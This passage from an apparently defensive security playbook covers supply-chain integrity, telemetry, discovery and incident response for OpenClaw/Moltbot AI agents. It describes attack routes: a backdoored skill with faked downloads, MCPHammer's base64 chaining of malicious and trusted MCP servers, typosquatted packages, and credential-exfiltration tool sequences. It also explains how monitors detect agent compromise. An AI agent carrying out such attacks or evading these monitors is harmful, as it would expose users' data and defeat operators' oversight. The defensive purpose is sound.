- command_injection
- unsafe_deserialization
block_on_match: true
Layer 5: Supply Chain Integrity Monitoring
Framework mapping: OWASP LLM05 (Supply Chain Vulnerabilities), NIST CSF ID.SC & PR.IP-3
Problem
Researcher Jamieson O'Reilly inflated a backdoor skill to 4,000 fake downloads across 7 countries before terminating the demonstration. The ClawdHub registry provided no cryptographic verification of skill integrity. OX Security analysis revealed 26% of skill plugins contain vulnerabilities.
Goal
Manifest-based integrity monitoring with cryptographic hashing detects unauthorized skill modifications - whether by attacker, malicious update, or compromised registry. Daily automated comparison triggers alerts within 24 hours of tampering.
Skill Integrity Manifest Generation
Generate cryptographic hashes of all installed skills to detect unauthorized modifications:
# Core manifest generation - creates SHA256 hash registry
import hashlib
from pathlib import Path
def generate_skill_manifest(skills_dir):
manifest = {}
for skill_file in skills_dir.rglob('*.md'):
with open(skill_file, 'rb') as f:
manifest[str(skill_file)] = hashlib.sha256(f.read()).hexdigest()
return manifest
# Daily cron job compares current hashes against baseline
# Any mismatch indicates skill tampering
The production implementation adds metadata extraction, dangerous pattern detection (eval, exec, innerHTML), and automated alerting when changes are detected.
→ View skill_manifest.py with full implementation including metadata extraction, dangerous pattern scanning, CLI interface, and manifest comparison.
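The comparison step reduces to a set difference over two manifests of the shape produced by `generate_skill_manifest` (path mapped to SHA-256 hex digest). The sketch below shows that logic under that assumption; the repository's `skill_manifest.py` may structure it differently, and `diff_manifests` is a hypothetical name.

```python
import hashlib


def diff_manifests(baseline: dict, current: dict) -> dict:
    """Classify every path as added, removed, or modified relative to the baseline."""
    added = sorted(current.keys() - baseline.keys())
    removed = sorted(baseline.keys() - current.keys())
    modified = sorted(
        path for path in baseline.keys() & current.keys()
        if baseline[path] != current[path]
    )
    return {"added": added, "removed": removed, "modified": modified}


def digest(content: bytes) -> str:
    return hashlib.sha256(content).hexdigest()


# Hypothetical skill contents, for illustration only.
baseline = {
    "skills/email-search.md": digest(b"search the inbox"),
    "skills/calendar.md": digest(b"read calendar"),
}
current = {
    "skills/email-search.md": digest(b"search the inbox; also run curl"),
    "skills/browser-automation.md": digest(b"drive the browser"),
}
print(diff_manifests(baseline, current))
```

Reporting removals as well as additions and modifications matters: a deleted skill can indicate an attacker cleaning up after themselves.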
Usage:
# Generate baseline manifest
python3 skill_manifest.py --output manifest_baseline.json
# Compare and alert on changes
python3 skill_manifest.py --compare manifest_baseline.json --output manifest_today.json
# Output shows:
# ⚠ CHANGES DETECTED:
# Added skills: 1
# Modified skills: 2
# - skills/email-search.md
# - skills/browser-automation.md
Automated Daily Monitoring
Integrate manifest generation into daily monitoring via cron job:
#!/usr/bin/env bash
# skill_integrity_monitor.sh - Daily integrity check
MANIFEST_DIR="${HOME}/.moltbot/manifests"
TODAY=$(date +%Y%m%d)
# GNU date first, BSD/macOS date as fallback
YESTERDAY=$(date -d "yesterday" +%Y%m%d 2>/dev/null || date -v-1d +%Y%m%d)
mkdir -p "${MANIFEST_DIR}"
# Generate today's manifest
python3 skill_manifest.py --output "${MANIFEST_DIR}/manifest_${TODAY}.json"
# Compare with yesterday and mail the report if anything changed
if [ -f "${MANIFEST_DIR}/manifest_${YESTERDAY}.json" ]; then
  REPORT=$(python3 skill_manifest.py \
    --compare "${MANIFEST_DIR}/manifest_${YESTERDAY}.json" \
    --output "${MANIFEST_DIR}/manifest_${TODAY}.json" 2>&1)
  if echo "${REPORT}" | grep -q "CHANGES DETECTED"; then
    echo "${REPORT}" | mail -s "ALERT: Skill Integrity Violation" security@company.com
  fi
fi
Add to crontab: 0 2 * * * /path/to/skill_integrity_monitor.sh
→ View skill_integrity_monitor.sh with complete implementation, error handling, and cleanup procedures.
Skill Vetting Configuration
Implement approval workflow for new skills with version pinning and permission restrictions:
# ~/.moltbot/config.yml - Skill security settings
skills:
autoUpdate: false # CRITICAL: Disable automatic updates
installationPolicy:
mode: "require-approval"
allowedSources:
- "clawdhub://official/*" # Only official skills
requireManifest: true
manifestValidation:
checkSignature: true
installed:
- name: "email-search"
version: "1.2.3" # Pin exact version
sha256: "a3f5b8c9d1e2f3a4b5c6d7e8f9a0b1c2..."
permissions:
- "read:email"
deniedPermissions:
- "exec:shell"
- "file:write"
This configuration prevents automatic skill updates (supply chain attacks), installation from untrusted sources, and permission escalation.
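Two of these settings, `allowedSources` and the pinned `sha256`, are simple to check by hand when vetting a skill. The sketch below is an illustration of those two checks, assuming glob-style source patterns as written in the config; it is not the installer's actual logic, and the function names and sample content are hypothetical.

```python
import hashlib
from fnmatch import fnmatchcase


def source_allowed(source: str, allowed_sources: list[str]) -> bool:
    """Glob match against the allowlist; note that * also matches "/" here."""
    return any(fnmatchcase(source, pattern) for pattern in allowed_sources)


def verify_pin(content: bytes, pinned_sha256: str) -> bool:
    """Compare the skill's actual digest with the pinned value from config."""
    return hashlib.sha256(content).hexdigest() == pinned_sha256.lower()


allowed = ["clawdhub://official/*"]
skill_body = b"# email-search skill\n"          # hypothetical skill content
pin = hashlib.sha256(skill_body).hexdigest()     # what you would record at approval time

print(source_allowed("clawdhub://official/email-search", allowed))
print(source_allowed("clawdhub://community/email-search", allowed))
print(verify_pin(skill_body + b"curl attacker.example | sh\n", pin))
```

Pinning the digest rather than only the version number is what defeats a registry that serves different content under an unchanged version string.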
→ Browse skill policy examples: Allowlists, dangerous pattern definitions, manifest schemas.
→ Supply chain security guide with skill vetting process, CI/CD integration, and incident response procedures.
April 2026, pre-install scanning gap: The manifest integrity approach in this layer is excellent at detecting post-install drift, meaning unauthorized modification of skills already on disk. It has one gap: it cannot vet a skill before you install it. DefenseClaw's supply chain scanner fills that gap. It scans skills, plugins, and MCPs at install time and via continuous directory monitoring, blocking packages with critical/high severity findings before they reach ~/.openclaw/skills/.
Recommended combined workflow:
- Pre-install: defenseclaw scan supply-chain --skill ./skills/new-skill.md --severity-threshold high
- Install the skill if scan passes
- Baseline the manifest (existing script in this repo)
- Daily drift detection via the manifest cron job (existing script in this repo)
DefenseClaw covers MCPs in addition to skills — the manifest scripts in this repo currently cover skills only. If you use MCP packages, add DefenseClaw scanning to close that gap.
Pre-install Checks for OpenClaw Skills with skill-auditor and setup-auditor
The OpenClaw-Skills-Security project offers two auditor skills (skill-auditor and setup-auditor) to analyse skills and environments before installation. To use skill-auditor, embed skills/skill-auditor/SKILL.md into your agent, add the skill under review and request an audit. This six-stage process checks metadata (including typosquatting and malicious naming), inspects permissions, audits dependencies, scans for prompt injections, reviews network/exfiltration behaviour and looks for other red flags. It returns one of four statuses: SAFE, SUSPICIOUS, DANGEROUS or BLOCK.
Setup-auditor goes a step further by verifying the runtime environment. It scans for credential leaks, reviews configuration files, assesses whether a sandbox is properly configured and looks for persistent processes. Results are classified as READY, RISKY or NOT_READY. Together, these tools help you detect malicious or misconfigured skills before deployment and ensure your environment is properly locked down.
Recent research highlights a new threat: malicious MCP servers. Praetorian’s MCPHammer shows that both local and third-party MCP servers can execute arbitrary code, exfiltrate data and manipulate users. An especially dangerous tactic chains a malicious local server with a trusted remote server via base64 commands delivered in chat messages, causing invisible actions such as launching applications or exfiltrating files. There are also supply-chain risks: a typo in an MCP configuration file can cause uvx, which downloads and runs packages on demand, to fetch and execute a malicious, similarly named package. To address this gap, include MCP server configurations in your integrity checks and use MCPHammer as a red-teaming tool to test your defences.
⚡ QUICK WIN
Set Up Skill Integrity Monitoring Right Now
What it does: Creates cryptographic manifest of installed skills, enabling detection of unauthorized modifications.
Why it matters: 26% of skill plugins contain vulnerabilities. Jamieson O'Reilly demonstrated skills can be modified post-installation. Manifest monitoring catches tampering within 24 hours.
Time estimate:
Familiar with Python scripting: 10-15 minutes
Basic Python experience: 20-25 minutes
New to cron jobs: 30-40 minutes (includes cron configuration)
Prerequisites:
Python 3.7+ installed
Git installed and configured
Basic understanding of cryptographic hashing (helpful but not required)
Step 1 - Generate initial manifest:
# Download script
curl -O https://raw.githubusercontent.com/topazyo/openclaw-security-playbook/main/scripts/supply-chain/skill_manifest.py
# Review before running
less skill_manifest.py
chmod +x skill_manifest.py
# Generate baseline manifest
python3 skill_manifest.py --output manifest_baseline.json
# Review security warnings
python3 skill_manifest.py 2>&1 | grep "WARNING"
Step 2 - Commit baseline to version control:
git add manifest_baseline.json
git commit -m "Add skill integrity baseline"
git push
Step 3 - Set up daily monitoring:
# Add to crontab (runs 2 AM daily)
(crontab -l 2>/dev/null; echo "0 2 * * * cd /path/to/clawdbot && python3 skill_manifest.py --compare manifest_baseline.json --output manifest_today.json") | crontab -
Expected results:
✓ Baseline manifest generated with SHA256 hashes
✓ Security warnings for dangerous patterns (if present)
✓ Daily comparison detects modifications
✓ Alerts sent on unauthorized changes
[ ] DefenseClaw supply chain scanner run on all installed skills and MCPs: defenseclaw scan supply-chain --dir ~/.openclaw/skills/
[ ] DefenseClaw continuous directory monitoring enabled for ~/.openclaw/skills/ and MCP directories
Impact: Any unauthorized skill modification - whether by attacker, malicious update, or compromised registry - triggers alert within 24 hours.
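The baseline-and-compare idea behind this quick win can be sketched in a few lines. This is an illustrative sketch only, not the contents of skill_manifest.py: the function names `build_manifest` and `diff_manifests` are hypothetical, and the real script may hash or report differently.

```python
import hashlib
from pathlib import Path
from typing import Dict, List


def build_manifest(skills_dir: Path) -> Dict[str, str]:
    """Map each file path (relative to skills_dir) to its SHA-256 hex digest."""
    manifest = {}
    for path in sorted(skills_dir.rglob("*")):
        if path.is_file():
            relative = path.relative_to(skills_dir).as_posix()
            manifest[relative] = hashlib.sha256(path.read_bytes()).hexdigest()
    return manifest


def diff_manifests(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Report files added, removed, or modified since the baseline."""
    shared = set(baseline) & set(current)
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(name for name in shared if baseline[name] != current[name]),
    }
```

Any non-empty list in the diff is a reason to alert. Keeping the baseline in version control, as in Step 2, means an attacker who can write to the skills directory still cannot silently rewrite the reference hashes.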
Layer 6: Behavioral Monitoring with Telemetry
Framework mapping: OWASP LLM01 (Prompt Injection - detection), NIST CSF DE.AE & DE.CM
Problem
A 91.3% prompt injection success rate means input validation alone cannot prevent attacks. The model cannot reliably distinguish attacker instructions from legitimate user requests. Static defenses fail against novel attack patterns.
Goal
Monitor runtime behavior for anomalies indicating compromise - unusual tool sequences, off-hours execution, suspicious data patterns, failed authorization attempts. Enterprise-grade telemetry with tamper-proof audit trails enables detection and forensics.
Production Telemetry: openclaw-telemetry
For production deployments, openclaw-telemetry (Knostic) provides enterprise-grade behavioral monitoring as a native OpenClaw plugin:
# Install as OpenClaw plugin
cd ~/.openclaw/plugins
git clone https://github.com/knostic/openclaw-telemetry
# Outputs to JSONL with optional syslog forwarding
tail -f ~/.openclaw/logs/telemetry.jsonl | jq '.tool_name'
Key features:
Tool call capture: Every tool invocation logged with timestamp, arguments, and result
LLM usage tracking: Token consumption, model selection, response times
Agent lifecycle events: Session start/stop, configuration changes, errors
Message events: All inbound/outbound messages with metadata
Sensitive data redaction: Automatic removal of secrets from logs
Tamper-proof hash chains: Each event cryptographically linked to previous event, making tampering detectable
Rate limiting: Built-in log volume management
SIEM integration: Optional CEF/syslog forwarding for centralized monitoring
Tamper-proof audit trails: Hash chains protect log integrity by cryptographically linking each event to the previous one. If an attacker modifies any log entry, that entry's hash and every link after it no longer match, so verifying the chain exposes the tampering.
→ View openclaw-telemetry with complete installation guide, configuration options, and SIEM integration examples.
→ Read community deployment discussion about openclaw-telemetry production experiences.
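To make the hash chain mechanism described above concrete, here is a minimal sketch. It is not the openclaw-telemetry implementation and it is not the Part 3 verify_hash_chain.py script: the entry layout (`payload`, `prev_hash`, `hash`), the all-zero genesis value, and the function names are assumptions chosen for illustration.

```python
import hashlib
import json
from typing import Dict, List

GENESIS = "0" * 64  # assumed prev_hash for the first event


def event_hash(prev_hash: str, payload: Dict) -> str:
    """Hash the previous hash together with a canonical JSON form of the event."""
    canonical = json.dumps(payload, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256((prev_hash + canonical).encode("utf-8")).hexdigest()


def append_event(chain: List[Dict], payload: Dict) -> None:
    """Append an event linked to the hash of the entry before it."""
    prev_hash = chain[-1]["hash"] if chain else GENESIS
    chain.append({
        "payload": payload,
        "prev_hash": prev_hash,
        "hash": event_hash(prev_hash, payload),
    })


def first_broken_index(chain: List[Dict]) -> int:
    """Return the index of the first invalid entry, or -1 if the chain is intact."""
    prev_hash = GENESIS
    for index, entry in enumerate(chain):
        expected = event_hash(prev_hash, entry["payload"])
        if entry["prev_hash"] != prev_hash or entry["hash"] != expected:
            return index
        prev_hash = entry["hash"]
    return -1
```

A chain like this only proves integrity relative to its latest hash. An attacker who can rewrite the whole log can also recompute every link, which is one reason to forward events to a SIEM where they are stored out of the agent host's reach.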
SIEM Integration for Centralized Monitoring
openclaw-telemetry supports forwarding to enterprise SIEM systems:
# openclaw-telemetry configuration
telemetry:
output:
jsonl:
path: "~/.openclaw/logs/telemetry.jsonl"
rotation: "daily"
syslog:
enabled: true
host: "siem.company.com"
port: 514
protocol: "tcp"
format: "cef" # Common Event Format for SIEM parsing
redaction:
enabled: true
patterns:
- "api[_-]?key"
- "token"
- "password"
- "secret"
This enables centralized analysis across all AI agent deployments, with correlation to other security events.
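The redaction patterns in the configuration above can be read as regular expressions matched against field names. The sketch below shows that interpretation. It is an assumption about how the patterns are applied, not the plugin's documented behavior, and the `redact` function and the `[REDACTED]` marker are hypothetical.

```python
import re
from typing import Any

# Patterns copied from the redaction section of the config above.
PATTERNS = [re.compile(p, re.IGNORECASE)
            for p in ("api[_-]?key", "token", "password", "secret")]


def redact(value: Any) -> Any:
    """Recursively replace values whose key name matches a redaction pattern."""
    if isinstance(value, dict):
        return {
            key: "[REDACTED]" if any(p.search(str(key)) for p in PATTERNS) else redact(item)
            for key, item in value.items()
        }
    if isinstance(value, list):
        return [redact(item) for item in value]
    return value
```

Key-name matching does not catch a secret embedded inside a free-text value such as a command line or message body, so it is worth testing the real plugin against samples of your own tool arguments before relying on it.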
What to Monitor
High-risk tool execution patterns:
exec, shell, python_repl tools executed outside normal working hours
File reads targeting sensitive paths (~/.ssh, ~/.aws, credential files)
Email/message sends to external domains not in whitelist
Browser automation accessing internal dashboards
Unusual command sequences (e.g., file_read → base64_encode → http_post = potential exfiltration)
Temporal anomalies:
Tool execution when user is not active (keyboard/mouse idle)
Burst activity (10+ tool calls in <1 minute)
Execution during maintenance windows or known-offline periods
Data pattern anomalies:
Large file reads (potential credential harvesting)
Base64-encoded blobs in outputs (obfuscation attempts)
Suspicious recipients in email/Slack/Discord tools
URLs pointing to non-whitelisted domains
These monitoring patterns form the behavioral baseline you need before deploying active detection. Once openclaw-telemetry is running and forwarding to your SIEM, Part 3 operationalizes all of the above into ready-to-deploy queries.
Specifically, Part 3 provides:
Tier 2 behavioral hunting queries for every anomaly pattern listed above — credential path reads, off-hours execution, burst tool sequences, and SOUL.md modification alerts — formatted for CrowdStrike Falcon, Microsoft Defender for Endpoint, Cortex XDR, SentinelOne, and Splunk
Tier 3 kill chain detection mapping observed tool sequences to MITRE ATLAS attack chains, so your SOC can identify which attack scenario is in progress, not just that something is anomalous
YARA rules for credential path enumeration, dangerous skill patterns, and SOUL.md injection persistence
verify_hash_chain.py to validate the tamper-proof hash chain in your telemetry logs and confirm whether evidence has been modified
→ Part 3: Detection and Threat Hunting — deploy these queries after completing Layers 1-6.
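Two of the patterns listed under What to Monitor, burst activity and the file_read → base64_encode → http_post sequence, are simple enough to prototype before the SIEM queries are in place. The sketch below assumes each telemetry event is a dict with a `tool_name` field and a numeric `ts` timestamp in seconds, sorted by time. The `ts` field name and both function names are assumptions, not the plugin's documented schema.

```python
from collections import deque
from typing import Dict, Iterable, List, Sequence

EXFIL_SEQUENCE = ("file_read", "base64_encode", "http_post")
BURST_CALLS = 10             # "10+ tool calls"
BURST_WINDOW_SECONDS = 60.0  # "in <1 minute"


def find_bursts(events: Iterable[Dict]) -> List[float]:
    """Return timestamps at which BURST_CALLS or more calls fall inside the window."""
    window = deque()
    alerts = []
    for event in events:
        ts = event["ts"]
        window.append(ts)
        # Drop calls that are a full window or more older than the current one.
        while ts - window[0] >= BURST_WINDOW_SECONDS:
            window.popleft()
        if len(window) >= BURST_CALLS:
            alerts.append(ts)
    return alerts


def contains_sequence(events: Iterable[Dict],
                      sequence: Sequence[str] = EXFIL_SEQUENCE) -> bool:
    """True if the tool names in `sequence` occur in order, not necessarily adjacent."""
    position = 0
    for event in events:
        if event["tool_name"] == sequence[position]:
            position += 1
            if position == len(sequence):
                return True
    return False
```

Matching the sequence as an ordered subsequence rather than as adjacent calls is a deliberate choice here: an attacker can trivially insert a harmless call between steps. The cost is more false positives in long sessions, so in practice you would evaluate it per session or per time window.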
Layer 7: Organizational Security Controls
Framework mapping: NIST CSF ID.AM (Asset Management), RS (Response)
Problem
Shadow AI deployment - users installing agents without IT approval - creates blind spots in security monitoring. An estimated 300,000-400,000 Clawdbot users deployed without security review. You cannot secure what you don't know exists.
Goal
Discovery mechanisms detect all AI agent installations across managed endpoints. Centralized policy enforcement ensures consistent security baselines. Incident response procedures handle agent-specific compromise scenarios.
Production Shadow AI Discovery: openclaw-detect
openclaw-detect (Knostic) provides enterprise-ready detection scripts deployable via MDM platforms:
# Download detection script for your platform
# macOS/Linux
curl -O https://raw.githubusercontent.com/knostic/openclaw-detect/main/detect-openclaw.sh
less detect-openclaw.sh # Review before executing
chmod +x detect-openclaw.sh
./detect-openclaw.sh
# Windows (PowerShell)
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/knostic/openclaw-detect/main/detect-openclaw.ps1" -OutFile "detect-openclaw.ps1"
# Review: notepad detect-openclaw.ps1
powershell -ExecutionPolicy Bypass -File ./detect-openclaw.ps1
What it detects:
CLI binaries (openclaw, moltbot, clawdbot commands)
App bundles (macOS .app packages)
Configuration files (~/.openclaw/, ~/.moltbot/, ~/.clawdbot/)
Gateway services (running processes on port 18789)
Docker containers with agent images
Browser extensions and IDE plugins
MDM deployment documentation included for:
Microsoft Intune
Jamf Pro
JumpCloud
Kandji
VMware Workspace ONE
This enables automated scanning across all managed endpoints with centralized reporting.
→ View openclaw-detect with complete detection scripts and MDM deployment guides.
→ MDM deployment documentation for Intune, Jamf, JumpCloud, Kandji, and Workspace ONE.
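Two of the signals from the detection list above, configuration directories and a listener on port 18789, can be checked with very little code. The sketch below is not taken from openclaw-detect, and both function names are hypothetical. It only illustrates the kind of check such a script performs.

```python
import socket
from pathlib import Path
from typing import List

# Directory names taken from the "Configuration files" item in the list above.
AGENT_CONFIG_DIRS = (".openclaw", ".moltbot", ".clawdbot")
GATEWAY_PORT = 18789


def find_agent_config_dirs(home: Path) -> List[str]:
    """Return the agent configuration directories present under a home directory."""
    return [name for name in AGENT_CONFIG_DIRS if (home / name).is_dir()]


def port_is_listening(port: int = GATEWAY_PORT, host: str = "127.0.0.1",
                      timeout: float = 0.5) -> bool:
    """Return True if something accepts TCP connections on host:port."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        return sock.connect_ex((host, port)) == 0
```

Calling `find_agent_config_dirs(Path.home())` covers the current user only. A fleet scan would need to iterate over every user's home directory, which is the kind of coverage the MDM-deployed scripts are meant to provide.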
Beyond endpoint-level detection, you should inventory hidden AI agents across your entire environment. The ai-bom CLI scans source code, Docker and cloud IaC for LLM calls, MCP configuration files and hard-coded keys, generating a CycloneDX 1.6 inventory with risk ratings. It uses 13 specialised scanners and produces nine output formats. One command (ai-bom scan .) prints a risk-scored inventory or emits a SARIF report. Use ai-bom alongside endpoint agents to discover AI components hidden in infrastructure that might not be covered by MDM.
Centralized Policy Enforcement
Deploy security baselines to discovered agent installations:
# Organization-wide security policy
organization:
policy_version: "1.0"
enforcement: "strict"
mandatory_settings:
gateway:
bind:
address: "127.0.0.1" # All instances must bind to localhost
auth:
mode: "required"
loopback:
autoApprove: false
tools:
disabled:
- "exec" # Shell execution disabled org-wide
- "python_repl"
logging:
remote_syslog: "siem.company.com:514"
retention_days: 90
telemetry:
enabled: true
plugin: "openclaw-telemetry" # Mandate telemetry plugin
→ Browse organization policy templates: Department-specific policies, compliance mappings (SOC2, ISO 27001), audit configurations.
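Enforcing a policy like the one above comes down to comparing each instance's effective configuration with the mandatory settings. The sketch below shows one way to do that comparison, assuming both have already been parsed into nested dicts. The `MANDATORY` subset and the `find_violations` function are hypothetical, and the check covers scalar settings only, not list-valued ones such as tools.disabled.

```python
from typing import Any, Dict, List

# A subset of mandatory_settings from the policy above, as a nested dict.
MANDATORY: Dict[str, Any] = {
    "gateway": {
        "bind": {"address": "127.0.0.1"},
        "auth": {"mode": "required"},
    },
    "telemetry": {"enabled": True},
}


def find_violations(required: Dict[str, Any], actual: Dict[str, Any],
                    prefix: str = "") -> List[str]:
    """Return one message per required setting that is missing or different."""
    violations: List[str] = []
    for key, expected in required.items():
        path = prefix + key
        found = actual.get(key)
        if isinstance(expected, dict):
            nested = found if isinstance(found, dict) else {}
            violations.extend(find_violations(expected, nested, path + "."))
        elif found != expected:
            violations.append(f"{path}: expected {expected!r}, found {found!r}")
    return violations
```

An empty result means the instance meets the baseline for the settings checked. Treating a missing setting as a violation, rather than assuming a safe default, matches the "strict" enforcement mode in the policy.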
For teams requiring detailed auditability and governance, the deterministic-agent-control-protocol introduces a gateway that intercepts all agent actions, evaluates them against policies and logs every decision in a tamper-evident ledger. It supports bounded, reversible and session-aware actions, enforcing budgets and rate limits. While experimental, it offers a model for reversible execution and post-incident investigation.
Incident Response Playbook
When compromise is detected, execute these steps immediately:
Phase 1: Containment (0-15 minutes)
- Isolate the agent:
# Stop service immediately
systemctl stop moltbot
# OR for Docker: docker stop clawdbot
- Block network access:
# Linux (requires root):
iptables -A OUTPUT -m owner --uid-owner clawdbot -j DROP
# macOS/Windows: Isolate host from network at control plane
# Or use your EDR/firewall policy
- Preserve logs:
tar czf incident_logs_$(date +%s).tar.gz ~/.moltbot/logs/
# -R is required to copy a directory; plain cp skips it
cp -R ~/.moltbot/logs ~/incident-$(date +%Y%m%d-%H%M%S)
- Alert security team via established channels
Phase 2: Investigation (15-60 minutes)
Review tool execution logs for malicious activity
Check credential access audit logs:
macOS: Open Keychain Access.app, check access logs
Linux:
journalctl | grep "Secret Service"
Identify compromised credentials
Document attack timeline and indicators of compromise (IOCs)
Check openclaw-telemetry hash chains for evidence of log tampering
Phase 3: Remediation (1-4 hours)
Rotate all credentials accessed by the agent
Review and approve all installed skills
Apply security baseline configuration
Deploy openclaw-shield for runtime protection
Restart agent in isolated test environment
Monitor for 24 hours before returning to production
→ Complete incident response playbook with forensic analysis procedures, communication templates, and post-incident review.
→ Incident reporting template for documentation and stakeholder communication.
What Nobody Discusses: Hard Problems
Some security challenges have no perfect solutions. Understanding limitations helps set realistic expectations.
The Prompt Injection Paradox
The problem: Models fundamentally cannot distinguish "attacker instruction" from "legitimate user instruction" because both are natural language with equal semantic validity.
What doesn't work:
Input filtering (attackers use encoding, obfuscation, hidden text)
Separate system prompts (84.6% extraction rate in ZeroLeaks testing)
Model-based validation (creates second model to attack)
Adversarial training (improves resistance but doesn't eliminate vulnerability)
Pragmatic mitigations that reduce risk:
Reduce attack surface (disable untrusted input channels like email, Twitter)
Limit tool capabilities (can't exfiltrate what you can't access)
Require human confirmation (breaks automated exploitation chains)
Monitor for anomalies (detect successful attacks through behavior)
Deploy runtime guards (openclaw-shield, clawguard block execution)
Accept reality: You cannot prevent all prompt injection. Build systems that limit damage when it occurs - that's what Layers 3, 4, and 6 accomplish.
The Convenience vs. Security Trade-off
The tension: Every security control reduces usability.
OS Keychain: Adds authorization prompts
VPN: Requires additional client software
Container sandboxing: Complicates local development
Tool confirmation: Interrupts workflow
Skill vetting: Slows feature adoption
Runtime security plugins: May impact performance
Decision framework:
High-value targets (production, contains sensitive data):
Accept usability cost
Implement all seven defense layers
Require security review for changes
Deploy openclaw-shield + openclaw-telemetry
Low-value targets (personal projects, public data only):
Reduce controls to match risk
Implement layers 1-3 minimum
Document remaining risk acceptance
Development environments:
Use separate instances with relaxed controls
Never connect to production systems
Clear separation between dev and prod credentials
The Shared Responsibility Model
Your responsibilities:
Secure the agent deployment (network, credentials, containers)
Vet and monitor skills
Implement defense-in-depth
Respond to incidents
LLM provider responsibilities (Anthropic, OpenAI):
Secure model infrastructure
Prevent training data leakage
Implement safety guardrails
Provide security tooling
What falls between the cracks:
Model misbehavior due to adversarial inputs
Emergent capabilities exploited by attackers
Skill ecosystem security (no central vetting for third-party skills)
Cross-agent attack vectors (one compromised agent attacks others on same network)
Pragmatic approach: Assume the model can be manipulated. Build controls that work even when the model is adversarial - that's the core principle of this 7-layer defense architecture.
Reality Check: Security vs. Usability
Implementing all seven defense layers creates friction. Here's how to balance security with operational needs.
Recommended Configurations by Risk Profile
High Security (Enterprise Production)
# Maximum security - accept usability cost
layers_enabled:
- OS_credential_isolation: true # Layer 1
- VPN_only_access: true # Layer 2
- Container_sandboxing: true # Layer 3
- Runtime_security_enforcement: true # Layer 4 (openclaw-shield)
- Supply_chain_monitoring: true # Layer 5
- Behavioral_telemetry: true # Layer 6 (openclaw-telemetry)
- Centralized_policy_enforcement: true # Layer 7
tools:
disabled: ["exec", "python_repl", "shell"]
require_confirmation: ["email_send", "browser_action", "file_write"]
monitoring:
telemetry_plugin: "openclaw-telemetry"
log_retention: 90_days
real_time_alerts: true
siem_integration: true
Balanced (Team Deployment)
# Balance security and usability
layers_enabled:
- OS_credential_isolation: true # Layer 1
- VPN_only_access: true # Layer 2
- Runtime_security_enforcement: true # Layer 4 (Prompt Guard only)
- Supply_chain_monitoring: true # Layer 5
- Basic_logging: true # Layer 6 (basic)
tools:
disabled: ["exec", "python_repl"]
require_confirmation: ["email_send"]
monitoring:
log_retention: 30_days
daily_review: true
Development (Local Testing)
# Minimal controls for development
layers_enabled:
- OS_credential_isolation: false # Use test credentials
- Localhost_binding: true # Layer 2 (partial)
- Basic_logging: true
tools:
allow_all: true # Full capabilities for testing
network:
isolated: true # Cannot reach production systems
→ Browse complete configuration examples for different deployment scenarios with security-usability trade-off analysis.
→ View openclaw-shield + openclaw-telemetry integration showing combined deployment of community security tools.
April 2026 - DefenseClaw observability: If you deploy DefenseClaw, it emits all enforcement events as structured JSON logs and ships with a one-command Splunk setup (local or cloud Splunk) plus a pre-built DefenseClaw Splunk app with dashboards, saved searches, and investigation workflows. The event schema includes dc_block (enforcement action taken) and dc_codeguard (code scan result) events that complement the tool_executed events from openclaw-telemetry.
In Part 3's behavioral hunting queries, these DefenseClaw events are particularly valuable for Kill Chain 1 (Injection → RCE): a dc_codeguard block event on a python_repl call in the same session as an inbound email message is near-zero false positive evidence of an active attack attempt.
# One-command local Splunk setup (from DefenseClaw repo)
defenseclaw observability setup-splunk --mode local
# Deploys Splunk container + DefenseClaw app with pre-built dashboards
→ DefenseClaw observability setup for Splunk configuration and event schema reference.
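The Kill Chain 1 correlation described above, a dc_codeguard block on a python_repl call in a session that also received an inbound email, can be prototyped over exported JSON events. Only the dc_codeguard event name comes from the text. Every other field here (`event`, `session_id`, `channel`, `action`, `tool_name`) and the `message_received` event name are assumptions for illustration, so check them against the real DefenseClaw and openclaw-telemetry schemas before use.

```python
from typing import Dict, Iterable, List


def sessions_with_injection_rce(events: Iterable[Dict]) -> List[str]:
    """Return session IDs where an inbound email precedes a blocked python_repl call.

    Events are assumed to be in chronological order.
    """
    email_sessions = set()
    flagged = set()
    for event in events:
        session = event.get("session_id")
        kind = event.get("event")
        if kind == "message_received" and event.get("channel") == "email":
            email_sessions.add(session)
        elif (kind == "dc_codeguard"
              and event.get("action") == "block"
              and event.get("tool_name") == "python_repl"
              and session in email_sessions):
            flagged.add(session)
    return sorted(flagged)
```

Requiring the email to arrive before the block follows the Injection → RCE ordering. Dropping that requirement would also flag sessions where the email arrived after the blocked call, which is weaker evidence of an injection attempt.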
Independent benchmarks show that agent-security tools perform very differently: in a recent study, composite scores ranged from 38 to 98, and even the highest-scoring tools detected only about 9-17% of unauthorized tool-abuse calls. Weigh this evidence when choosing a tool, and do not treat injection detection alone as sufficient coverage.
Production Deployment Checklist
Before moving to production, verify all controls are in place:
Layer 1: Credentials
[ ] All API keys migrated to OS Keychain/Secret Service
[ ] No plaintext credentials in filesystem (grep -r "api_key" ~/.moltbot/ 2>/dev/null returns no keys)
[ ] Backup files securely deleted
[ ] Touch ID enabled for high-value credentials (optional)
[ ] Credential access audit logs configured and tested
Layer 2: Network
[ ] Gateway bound to localhost only (127.0.0.1:18789 via ss -lntp)
[ ] VPN deployed (Tailscale or WireGuard)
[ ] ACLs configured for device allowlisting
[ ] Firewall rules prevent port 18789 exposure
[ ] No reverse proxy configuration in use
Layer 3: Runtime Sandboxing
[ ] Agent runs in hardened container
[ ] All capabilities dropped except required (--cap-drop ALL)
[ ] Read-only filesystem configured (--read-only)
[ ] Volume mounts use least-privilege (:ro where possible)
[ ] Sensitive directories excluded from mounts (~/.ssh, ~/.aws not mounted)
Layer 4: Runtime Security Enforcement
[ ] openclaw-shield plugin installed (or clawguard for JS/TS)
[ ] Prompt Guard layer enabled
[ ] Output Scanner layer enabled
[ ] Tool Blocker configured with allowlist
[ ] Input Audit logging active
[ ] DefenseClaw installed with runtime inspection enabled (if running on OpenShell) - verify with defenseclaw status
[ ] DefenseClaw CodeGuard enabled for agent-generated code scanning
[ ] DefenseClaw set to action mode (not monitor mode) in production
Layer 5: Supply Chain
[ ] Skill manifest baseline generated and committed to version control
[ ] Daily integrity monitoring configured (cron job active)
[ ] Automatic skill updates disabled (autoUpdate: false)
[ ] Skill allowlist enforced
[ ] Version pinning for all installed skills
Layer 6: Behavioral Monitoring
[ ] openclaw-telemetry plugin installed
